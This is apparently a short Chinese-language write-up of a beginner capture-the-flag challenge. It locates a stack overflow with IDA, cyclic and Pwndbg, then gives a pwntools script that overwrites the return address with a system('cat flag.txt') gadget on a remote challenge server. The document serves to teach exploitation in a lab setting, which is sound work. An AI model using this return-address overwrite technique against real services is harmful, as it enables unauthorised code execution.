本題利用了較為基礎的一個棧溢出來獲取系統權限
首先我們打開IDA進行分析,搜索字符串我們可以看到有cat flag.txt的關鍵字樣
進入跟蹤,我們可以看到,程序調用了system命令
首先我們用cyclic創建一個200字符的字符串,利用它來判斷溢出點到返回地址的偏移
啟動Pwndbg進行調試
由圖可得,根據小端序,'saaa'之前有多少個字符,就是偏移量
寫出腳本
from pwn import* p=remote('node3.buuoj.cn',29184)#根據靶機不同來進行更改 addr=0x40060d payload='a'*72+p64(addr) p.sendline(payload) p.interactive()
打通服務器,拿到flag